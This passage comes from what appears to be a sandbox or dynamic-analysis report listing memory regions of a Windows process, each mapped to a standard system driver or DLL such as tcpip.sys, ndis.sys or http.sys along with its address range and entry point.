0x5b0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dmvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\dmvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\dmvsc.sys.mui") Region: id = 2926 start_va = 0x5a0000 end_va = 0x5aefff monitored = 0 entry_point = 0x5a36e0 region_type = mapped_file name = "dmvsc.sys" filename = "\\Windows\\System32\\drivers\\dmvsc.sys" (normalized: "c:\\windows\\system32\\drivers\\dmvsc.sys") Region: id = 2927 start_va = 0x5b0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dmvsc.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\dmvsc.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\dmvsc.sys.mui") Region: id = 2928 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2929 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2930 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2931 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2932 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2933 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2934 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2935 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2936 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2937 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2938 start_va = 0x5a0000 end_va = 0x5bafff monitored = 1 entry_point = 0x5a1190 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 2939 start_va = 0x5c0000 end_va = 0x5cbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 2940 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 2941 start_va = 0x1ad0000 end_va = 0x1bdefff monitored = 0 entry_point = 0x1b0c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2942 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 2943 start_va = 0x1ad0000 end_va = 0x1bdefff monitored = 0 entry_point = 0x1b0c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 2944 start_va = 0x5a0000 end_va = 0x5b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tcpip.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tcpip.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tcpip.sys.mui") Region: id = 2945 start_va = 0x1ad0000 end_va = 0x1d26fff monitored = 0 entry_point = 0x1cdce10 region_type = mapped_file name = "tcpip.sys" filename = "\\Windows\\System32\\drivers\\tcpip.sys" (normalized: "c:\\windows\\system32\\drivers\\tcpip.sys") Region: id = 2946 start_va = 0x5a0000 end_va = 0x5b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tcpip.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\tcpip.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\tcpip.sys.mui") Region: id = 2947 start_va = 0x1ad0000 end_va = 0x1d26fff monitored = 0 entry_point = 0x1cdce10 region_type = mapped_file name = "tcpip.sys" filename = "\\Windows\\System32\\drivers\\tcpip.sys" (normalized: "c:\\windows\\system32\\drivers\\tcpip.sys") Region: id = 2948 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2949 start_va = 0x1ad0000 end_va = 0x1be0fff monitored = 0 entry_point = 0x1bc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2950 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2951 start_va = 0x1ad0000 end_va = 0x1be0fff monitored = 0 entry_point = 0x1bc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2952 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2953 start_va = 0x1ad0000 end_va = 0x1be0fff monitored = 0 entry_point = 0x1bc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2954 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2955 start_va = 0x1ad0000 end_va = 0x1be0fff monitored = 0 entry_point = 0x1bc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2956 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2957 start_va = 0x1ad0000 end_va = 0x1be0fff monitored = 0 entry_point = 0x1bc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2958 start_va = 0x5a0000 end_va = 0x5a9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "http.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\http.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\http.sys.mui") Region: id = 2959 start_va = 0x1ad0000 end_va = 0x1be0fff monitored = 0 entry_point = 0x1bc1bf0 region_type = mapped_file name = "http.sys" filename = "\\Windows\\System32\\drivers\\http.sys" (normalized: "c:\\windows\\system32\\drivers\\http.sys") Region: id = 2960 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 2961 start_va = 0x5b0000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 2962 start_va = 0x5a0000 end_va = 0x5affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 2963 start_va = 0x5b0000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 3028 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3029 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3030 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3031 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3032 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3033 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3034 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3035 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3036 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3037 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3038 start_va = 0x5a0000 end_va = 0x5b1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "srv2.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\srv2.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\srv2.sys.mui") Region: id = 3039 start_va = 0x1610000 end_va = 0x16befff monitored = 0 entry_point = 0x1687000 region_type = mapped_file name = "srv2.sys" filename = "\\Windows\\System32\\drivers\\srv2.sys" (normalized: "c:\\windows\\system32\\drivers\\srv2.sys") Region: id = 3040 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3041 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3042 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3043 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3044 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3045 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3046 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3047 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3048 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3049 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3050 start_va = 0x5a0000 end_va = 0x5a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usbxhci.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\USBXHCI.SYS.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\usbxhci.sys.mui") Region: id = 3051 start_va = 0xd10000 end_va = 0xd70fff monitored = 0 entry_point = 0xd20770 region_type = mapped_file name = "usbxhci.sys" filename = "\\Windows\\System32\\drivers\\USBXHCI.SYS" (normalized: "c:\\windows\\system32\\drivers\\usbxhci.sys") Region: id = 3052 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3053 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3054 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3055 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3056 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3057 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3058 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3059 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3060 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3061 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3062 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3063 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3064 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3065 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3066 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3067 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3068 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3069 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3070 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3071 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3072 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3073 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3074 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3075 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3076 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3077 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3078 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3079 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3080 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3081 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3082 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3083 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3084 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3085 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3086 start_va = 0x5a0000 end_va = 0x5b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 3087 start_va = 0x1ad0000 end_va = 0x1beffff monitored = 0 entry_point = 0x1bcc040 region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 3088 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3089 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3090 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3091 start_va = 0x5b0000 end_va = 0x5c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll.mui" filename = "\\Windows\\System32\\en-US\\advapi32res.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\advapi32res.dll.mui") Region: id = 3092 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "advapi32res.dll" filename = "\\Windows\\System32\\advapi32res.dll" (normalized: "c:\\windows\\system32\\advapi32res.dll") Region: id = 3093 start_va 